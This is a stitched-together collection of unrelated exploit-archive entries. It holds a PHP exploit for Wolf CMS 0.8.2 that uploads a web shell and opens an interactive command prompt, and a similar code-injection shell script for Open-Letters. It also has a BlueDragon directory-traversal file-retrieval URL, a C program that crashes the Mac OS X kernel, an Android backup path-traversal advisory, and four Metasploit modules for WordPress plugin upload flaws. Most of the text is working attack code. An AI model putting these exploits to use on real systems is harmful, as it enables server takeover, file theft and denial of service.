Site : www.2600.in.th
Vendor Homepage : https://www.wolfcms.org/
Software Link : https://bitbucket.org/wolfcms/wolf-cms-downloads/downloads/wolfcms-0.8.2.zip
Version : 0.8.2
####################
SOFTWARE DESCRIPTION
####################
Wolf CMS is a content management system and is Free Software published under the GNU General Public License v3.
Wolf CMS is written in the PHP programming language. Wolf CMS is a fork of Frog CMS.
#######################################
VULNERABILITY: Arbitrary File Upload
#######################################
This exploit a file upload vulnerability found in Wolf CMS 0.8.2, and possibly prior. Attackers can abuse the
upload feature in order to upload a malicious PHP file into the application with authenticated user, which results in arbitrary remote code execution.
The vulnerability was found on File Manager Function (Enabled by default), which provides interfaces to manage files from the administration.
In this simple example, there are no restrictions made regarding the type of files allowed for uploading.
Therefore, an attacker can upload a PHP shell file with malicious code that can lead to full control of a victim server.
Additionally, the uploaded file can be moved to the root directory, meaning that the attacker can access it through the Internet.
/wolf/plugins/file_manager/FileManagerController.php (LINE: 302-339)
-----------------------------------------------------------------------------
// Clean filenames
$filename = preg_replace('/ /', '_', $_FILES['upload_file']['name']);
$filename = preg_replace('/[^a-z0-9_\-\.]/i', '', $filename);
if (isset($_FILES)) {
$file = $this->_upload_file($filename, FILES_DIR . '/' . $path . '/', $_FILES['upload_file']['tmp_name'], $overwrite);
if ($file === false)
Flash::set('error', __('File has not been uploaded!'));
}
-----------------------------------------------------------------------------
#####################
Disclosure Timeline
#####################
[04/04/2015] - Issue reported to Developer Team
[08/04/2015] - Discussed for fixing the issue
[16/04/2015] - Issue reported to http://seclists.org/oss-sec/2015/q2/210
[22/04/2015] - Public disclosure
#####################################################
EXPLOIT
#####################################################
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 50);
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80)))
die("\n[-] No response from {$host}:80\n");
fputs($sock, $packet);
return stream_get_contents($sock);
}
print "\n+---------------------------------------+";
print "\n| WolfCMS Arbitrary File Upload Exploit |";
print "\n+---------------------------------------+\n";
if ($argc < 5)
{
print "\nUsage......: php $argv[0] <host> <path> <user> <pass>\n";
print "\nExample....: php $argv[0] localhost /wolfcms test password\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];
print "\n ,--^----------,--------,-----,-------^--, \n";
print " | ||||||||| `--------' | O \n";
print " `+---------------------------^----------| \n";
print " `\_,-------, _________________________| \n";
print " / XXXXXX /`| / \n";
print " / XXXXXX / `\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " `------' \n";
$login = "login[username]={$user}&login[password]={$pass}&login[redirect]=/wolfcms/?/admin/";
$packet = "POST {$path}/?/admin/login/login HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID=cwh\r\n";
$packet .= "Content-Length: ".strlen($login)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$login}";
$response = http_send($host, $packet);
if (!preg_match_all("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n");
$packet = "GET {$path}/?/admin/plugin/file_manager HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$sid[1][2]}\r\n";
$packet .= "Connection: close\r\n\r\n";
$response=http_send($host, $packet);
if (!preg_match_all("/csrf_token\" type=\"hidden\" value=\"(.*?)\" \/>/i", $response, $token)) die("\n[-] The username/password is incorrect!\n");
print "\n[+] Login Successfully !!\n";
sleep(2);
print "\n[+] Retrieving The Upload token !!\n";
print "[+] The token is: {$token[1][4]}\n";
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"csrf_token\"\r\n\r\n";
$payload .= "{$token[1][4]}\r\n";
$payload .= "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"upload_file\"; filename=\"shell.php\"\r\n";
$payload .= "Content-Type: application/octet-stream\r\n\r\n";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}/?/admin/plugin/file_manager/upload HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$sid[1][2]}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
http_send($host, $packet);
$packet = "GET {$path}/public/shell.php HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nWolf-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
################################################################################################################
# Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
?>
Vulnerability title: Arbitrary File Retrieval + Deletion In New Atlanta BlueDragon CFChart Servlet
CVE: CVE-2014-5370
Vendor: New Atlanta
Product: BlueDragon CFChart Servlet
Affected version: 7.1.1.17759
Fixed version: 7.1.1.18527
Reported by: Mike Westmacott
Details:
The CFChart servlet of BlueDragon (component com.naryx.tagfusion.cfm.cfchartServlet) is vulnerable to arbitrary file retrieval due to a directory traversal vulnerability. In certain circumstances the retrieved file is also deleted.
Exploit:
In order to retrieve a file from a vulnerable server use the following URL in a web browser and intercept the response from the server:
http://TARGETHOST/cfchart.cfchart?..\..\..\..\..\..\..\..\..\..\TARGETFILE
The browser will display a broken image, however the HTTP response will contain the file’s contents.
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-5370/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
/*
* 2015, Maxime Villard, CVE-2015-1100
* Local DoS caused by a missing limit check in the fat loader of the Mac OS X
* Kernel.
*
* $ gcc -o Mac-OS-X_Fat-DoS Mac-OS-X_Fat-DoS.c
* $ ./Mac-OS-X_Fat-DoS BINARY-NAME
*
* Obtained from: http://m00nbsd.net/garbage/Mac-OS-X_Fat-DoS.c
* Analysis: http://m00nbsd.net/garbage/Mac-OS-X_Fat-DoS.txt
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <spawn.h>
#include <unistd.h>
#include <err.h>
#include <mach-o/fat.h>
#include <sys/stat.h>
#define MAXNUM (4096)
#define MAXNUM0 (OSSwapBigToHostInt32(MAXNUM))
void CraftBinary(char *name)
{
struct fat_header fat_header;
struct fat_arch *arches;
size_t i;
int fd;
memset(&fat_header, 0, sizeof(fat_header));
fat_header.magic = FAT_MAGIC;
fat_header.nfat_arch = 4096;
if ((arches = calloc(MAXNUM0, sizeof(struct fat_arch))) == NULL)
err(-1, "calloc");
for (i = 0; i < MAXNUM0; i++)
arches[i].cputype = CPU_TYPE_I386;
if ((fd = open(name, O_CREAT|O_RDWR)) == -1)
err(-1, "open");
if (write(fd, &fat_header, sizeof(fat_header)) == -1)
err(-1, "write");
if (write(fd, arches, sizeof(struct fat_arch) * MAXNUM0) == -1)
err(-1, "write");
if (fchmod(fd, S_IXUSR) == -1)
err(-1, "fchmod");
close(fd);
free(arches);
}
void SpawnBinary(char *name)
{
cpu_type_t cpus[] = { CPU_TYPE_HPPA, 0 };
char *argv[] = { "Crazy Horse", NULL };
char *envp[] = { NULL };
posix_spawnattr_t attr;
size_t set = 0;
int ret;
if (posix_spawnattr_init(&attr) == -1)
err(-1, "posix_spawnattr_init");
if (posix_spawnattr_setbinpref_np(&attr, 2, cpus, &set) == -1)
err(-1, "posix_spawnattr_setbinpref_np");
fprintf(stderr, "----------- Goodbye! -----------\n");
ret = posix_spawn(NULL, name, NULL, &attr, argv, envp);
fprintf(stderr, "Hum, still alive. You are lucky today! ret = %d\n", ret);
}
int main(int argc, char *argv[])
{
if (argc != 2) {
printf("Usage: %s BINARY-NAME\n", argv[0]);
} else {
CraftBinary(argv[1]);
SpawnBinary(argv[1]);
}
}
<?php
/*
OutPut:
#[+] Author: TUNISIAN CYBER
#[+] Script coded BY: Egidio Romano aka EgiX
#[+] Title: Open-Letters Remote PHP Code Injection Vulnerability
#[+] Date: 19-04-2015
#[+] Vendor: http://www.open-letters.de/
#[+] Type: WebAPP
#[+] Tested on: KaliLinux (Debian)
#[+] CVE:
#[+] Twitter: @TCYB3R
#[+] Egix's Contact: n0b0d13s[at]gmail[dot]com
#[+] Proof of concept: http://i.imgur.com/TNKV8Mt.png
OL-shell>
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80)))
die( "\n[-] No response from {$host}:80\n");
fwrite($sock, $packet);
return stream_get_contents($sock);
}
print "#[+] Author: TUNISIAN CYBER\n";
print "#[+] Script coded BY: Egidio Romano aka EgiX\n";
print "#[+] Title: Open-Letters Remote PHP Code Injection Vulnerability\n";
print "#[+] Date: 19-04-2015\n";
print "#[+] Vendor: http://www.open-letters.de/\n";
print "#[+] Type: WebAPP\n";
print "#[+] Tested on: KaliLinux (Debian)\n";
print "#[+] CVE:\n";
print "#[+] Twitter: @TCYB3R\n";
print "#[+] Egix's Contact: n0b0d13s[at]gmail[dot]com\n";
print "#[+] Proof of concept: http://i.imgur.com/TNKV8Mt.png";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path>";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /zenphoto/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$exploit = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";
$packet = "POST {$path}external_scripts/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($exploit)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$exploit}";
http_send($host, $packet);
$packet = "GET {$path}external_scripts/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nOL-shell> ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?
print $m[1] : die("\n[-] Exploit failed!\n");
}
?>
ADB backup archive path traversal file overwrite
------------------------------------------------
Using adb one can create a backup of his/her Android device and store it
on the PC. The backup archive is based on the tar file format.
By modifying tar headers to contain ../../ like patterns it is possible
to overwrite files owned by the system user on writeable partitions.
An example pathname in the tar header:
apps/com.android.settings/sp/../../../../data/system/evil.txt
Tar header checksum must be corrected of course.
When restoring the modified archive the BackupManagerService overwrites
the resolved file name, since file name is not sanitized.
Bugfix in the version control:
https://android.googlesource.com/platform/frameworks/base/+/7bc601d%5E!/#F0
Android 5 (Lollipop) and newer versions are not affected (due to the
official bugfix linked above).
Additional conditions for exploiting on pre-Lollipop systems:
- Partition of the desination file must be mounted as writeable (eg.
/system won't work, but /data does)
- It is not possible to overwrite files owned by root, since the process
doing the restore is running as the same user as the package itself and
Android packages cannot run.
- It is not possible to overwrite files owned by system user since AOSP
4.3 due to Id6a0cb4c113c2e4a8c4605252cffa41bea22d8a3, a new hardening
was introduced "... ignoring non-agent system package ".
(If the operating system is custom and there is a system package
available with a full backup agent specified explicitly, then that
custom Android 4.3 and 4.4 might be affected too.)
Pre 4.3 AOSP systems are affected without further conditions: it is
possible to overwrite files owned by the system user or any other
packages installed on the system.
Tested on: Android 4.0.4:
Reported on: 2014-07-14
Assigned CVE: CVE-2014-7951
Android bug id: 16298491
Discovered by: Imre Rad / Search-Lab Ltd.
http://www.search-lab.hu
http://www.securecodingacademy.com/
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Wordpress Work The Flow Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary PHP code upload in the WordPress Work The Flow plugin,
version 2.5.2. The vulnerability allows for arbitrary file upload and remote code execution.
},
'Author' =>
[
'Claudio Viviani', # Vulnerability discovery
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['WPVDB', '7883'],
['EDB', '36640'],
['URL', 'http://packetstormsecurity.com/files/131294/WordPress-Work-The-Flow-2.5.2-Shell-Upload.html']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Work The Flow 2.5.2', {}]],
'DisclosureDate' => 'Mar 14 2015',
'DefaultTarget' => 0)
)
end
def check
check_plugin_version_from_readme('work-the-flow-file-upload', '2.5.4')
end
def exploit
php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
data = Rex::MIME::Message.new
data.add_part('upload', nil, nil, 'form-data; name="action"')
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files\"; filename=\"#{php_pagename}\"")
post_data = data.to_s
res = send_request_cgi({
'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php'),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res
if res.code == 200
print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
register_files_for_cleanup(php_pagename)
else
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
end
else
fail_with(Failure::Unknown, 'ERROR')
end
print_status("#{peer} - Calling payload...")
send_request_cgi(
'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename)
)
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Wordpress Creative Contact Form Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary PHP code upload in the WordPress Creative Contact
Form version 0.9.7. The vulnerability allows for arbitrary file upload and remote code execution.
},
'Author' =>
[
'Gianni Angelozzi', # Vulnerability discovery
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['EDB', '35057'],
['OSVDB', '113669'],
['WPVDB', '7652']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Creative Contact Form 0.9.7', {}]],
'DisclosureDate' => 'Oct 22 2014',
'DefaultTarget' => 0)
)
end
def check
check_plugin_version_from_readme('sexy-contact-form', '1.0.0')
end
def exploit
php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
data = Rex::MIME::Message.new
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files[]\"; filename=\"#{php_pagename}\"")
post_data = data.to_s
res = send_request_cgi({
'uri' => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'index.php'),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res
if res.code == 200 && res.body =~ /files|#{php_pagename}/
print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
register_files_for_cleanup(php_pagename)
else
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
end
else
fail_with(Failure::Unknown, 'ERROR')
end
print_status("#{peer} - Calling payload...")
send_request_cgi(
'uri' => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'files', php_pagename)
)
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Wordpress N-Media Website Contact Form Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary PHP code upload in the WordPress N-Media Website Contact Form
plugin, version 1.3.4. The vulnerability allows for arbitrary file upload and remote code execution.
},
'Author' =>
[
'Claudio Viviani', # Vulnerability discovery
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/'],
['WPVDB', '7896']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['N-Media WebSite Contact Form 1.3.4', {}]],
'DisclosureDate' => 'Apr 12 2015',
'DefaultTarget' => 0)
)
end
def check
check_plugin_version_from_readme('website-contact-form-with-file-upload', '1.5')
end
def exploit
php_pagename = rand_text_alpha(4 + rand(4)) + '.php'
data = Rex::MIME::Message.new
data.add_part('upload', nil, nil, 'form-data; name="action"')
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{php_pagename}\"")
data.add_part('nm_webcontact_upload_file', nil, nil, 'form-data; name="action"')
post_data = data.to_s
res = send_request_cgi({
'uri' => wordpress_url_admin_ajax,
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res
if res.code == 200 && res.body =~ /filename/
begin
new_php_pagename = JSON.parse(res.body)["filename"]
rescue JSON::ParserError
fail_with(Failure::Unknown, 'Unable to parse JSON data for the filename')
end
print_good("#{peer} - Our payload is at: #{new_php_pagename}. Calling payload...")
register_files_for_cleanup(new_php_pagename)
else
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
end
else
fail_with(Failure::Unknown,'ERROR')
end
print_status("#{peer} - Calling payload...")
send_request_cgi(
'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'contact_files', new_php_pagename)
)
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Wordpress Reflex Gallery Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery
version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution.
},
'Author' =>
[
'Unknown', # Vulnerability discovery
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['EDB', '36374'],
['OSVDB', '88853'],
['WPVDB', '7867']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Reflex Gallery 3.1.3', {}]],
'DisclosureDate' => 'Dec 30 2012', # OSVDB? EDB? WPVDB? Cannot set the date.
'DefaultTarget' => 0)
)
end
def check
check_plugin_version_from_readme('reflex-gallery', '3.1.4')
end
def exploit
php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
data = Rex::MIME::Message.new
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"qqfile\"; filename=\"#{php_pagename}\"")
post_data = data.to_s
time = Time.new
year = time.year.to_s
month = "%02d" % time.month
res = send_request_cgi({
'uri' => normalize_uri(wordpress_url_plugins, 'reflex-gallery', 'admin', 'scripts', 'FileUploader', 'php.php'),
'method' => 'POST',
'vars_get' => {
'Year' => "#{year}",
'Month' => "#{month}"
},
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res
if res.code == 200 && res.body =~ /success|#{php_pagename}/
print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
register_files_for_cleanup(php_pagename)
else
fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}")
end
else
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end
print_status("#{peer} - Calling payload...")
send_request_cgi(
'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}", "#{month}", php_pagename)
)
end
end